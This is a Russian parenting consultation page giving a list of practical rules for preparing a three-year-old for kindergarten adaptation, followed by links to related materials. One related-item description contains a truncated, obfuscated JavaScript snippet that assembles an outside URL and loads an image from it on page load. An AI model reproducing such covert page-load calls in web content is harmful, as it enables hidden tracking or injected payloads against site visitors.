Если вашему ребенку 3 года
консультация на тему

Балдина Мария Михайловна

Несколько правил о детском саде

Скачать:

ВложениеРазмер
Файл uvazhaemye_vzroslye.docx15.01 КБ

Предварительный просмотр:

Уважаемые взрослые!

 Если вашему ребенку 3 года

  •  Расскажите ребёнку, что такое детский сад, зачем туда ходят дети.

Почему вы хотите, чтобы малыш пошёл в сад. Заинтересуйте его, расскажите ему, что вам тоже нужно идти на работу, договоритесь вечером делиться информацией, у кого, что интересного произошло за день.

  •  Проходя мимо детского сада, с радостью напоминайте ребёнку, как ему повезло – скоро он сможет пойти сюда. Рассказывайте родным и знакомым в присутствие малыша о своей удаче, говорите, что гордитесь своим ребёнком, ведь его приняли в детский сад.
  •  Подробно расскажите ребёнку о режиме детского сада: что, как и в какой последовательности он будет делать. Чем подробнее будет ваш рассказ, и чем чаще вы его будете повторять, тем спокойнее и увереннее будет чувствовать себя ваш ребёнок, когда пойдёт в сад. Спрашивайте у малыша, запомнил ли он, что будет делать в саду после прогулки, куда складывать свои вещи, кто ему будет помогать раздеваться, а что он будет делать после обеда. Вопросами такого рода вы сможете проконтролировать, хорошо ли ребёнок запомнил последовательность событий. Малышей пугает неизвестность. Когда ребёнок видит, что ожидаемое событие происходит, как и было обещано, он чувствует себя увереннее.
  •  Поговорите с ребёнком о возможных трудностях. К кому он может обратиться за помощью, как он это сделает. Объясните также, что в группе будет много ребят и иногда придётся ждать своей очереди, чтобы получить желаемое.
  •  Приготовьте вместе с ребёнком «радостную коробку», складывая туда недорогие вещи. Это могут быть небольшие игрушки, которые остаются привлекательным для вашего ребёнка и точно понравятся другим детям. Это могут быть коробочки с вложенными в них забавными предметами, красивые бумажные салфетки или лоскутки приятной на ощупь ткани, книжки с картинками. За лето можно заполнить коробку и осенью отправлять ребёнка с какой-нибудь игрушкой из неё в детский сад, чтобы ему было там спокойнее.
  •  Научите малыша знакомиться с другими детьми, обращаться к ним по имени, просить, а не отнимать игрушки, предлагать свои игрушки, свои услуги другим детям.
  •  Разработайте вместе с ребёнком несложную схему прощальных знаков внимания, и ему будет проще отпускать вас.
  •  Помните, что на привыкание ребёнка к детскому саду может потребоваться до полугода. Рассчитывайте свои силы, возможности и планы. Лучше, если на этот период у семьи будет возможность подстроиться к особенностям адаптации своего малыша.
  •  Убедитесь в собственной уверенности, что вашей семье детский сад необходим именно сейчас. Ребёнок отлично чувствует, когда родители сомневаются в целесообразности «садовского» воспитания. Легче и быстрее привыкают дети, у родителей которых нет альтернативы детскому саду.
  •  Ребёнок привыкнет тем быстрее, чем с большим количеством детей и взрослых сможет построить отношения. Помогите ребёнку в этом. Познакомьтесь с другими родителями и их детьми. Называйте других детей в присутствии вашего ребёнка по именам. Чем лучше будут ваши отношения с воспитателями и другими родителями и их детьми, тем проще будет привыкнуть вашему ребёнку к детскому саду.
  •  Совершенных людей нет. Будьте терпеливы и снисходительны к другим. Если какие-то ситуации вас тревожат, обязательно разъясняйте их, лучше делать это в мягкой форме или через специалистов (воспитателей вашей группы детского сада, психолога и др.).
  •  В присутствии ребёнка избегайте критических замечаний в адрес детского сада и его сотрудников. Никогда не пугайте ребёнка детским садом.
  •  В период адаптации эмоционально поддерживайте малыша. Теперь вы проводите с ним меньше времени. Компенсируйте это качеством общения. Чаще обнимайте ребёнка (не менее 8 раз в день), подбадривайте его.
  •  Если через месяц ваш ребёнок ещё не привык к детскому саду, проверьте список рекомендаций и попытайтесь выполнить те рекомендации, о которых вы забыли.

 

 


По теме: методические разработки, презентации и конспекты

консультация для родителей "Если Вашему ребёнку уже исполнилось 4 года!"

Комплекс из пяти упражнений создан для того, чтобы укрепить детский позвоночник....

Консультация для родителей: «ПОЧЕМУ ОПАСНО ГОВОРИТЬ «НЕ ОБРАЩАЙ ВНИМАНИЯ», ЕСЛИ ВАШЕГО РЕБЕНКА ДРАЗНЯТ»

Консультация для родителей «ПОЧЕМУ ОПАСНО ГОВОРИТЬ «НЕ ОБРАЩАЙ ВНИМАНИЯ»,ЕСЛИ ВАШЕГО РЕБЕНКА ДРАЗНЯТ»...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Если Вашему ребенку поставили ЗПР

Если вашему ребенку поставили диагноз ЗПР, то не стоит паниковать и бояться, тем более откладывать решение на потом в надежде, что пройдет.Лучше начать помогать своему ребенку, как можно раньше, ведь ...

Если вашему ребенку поставили заключение "Дизартрия".

Консультации для родителей с теоретическим и практико-ориентированным материалом.....

Информационная листовка по теме: "Если вашему ребенку поставили диагноз дизартрия."

Информационная листовка, где доступным языком расссказывает о том, что такое дизартрия, ее видах, симптомах и том, к ками спцеиалистам следует обращаться. Но нив коем случае не заниматься самолочением...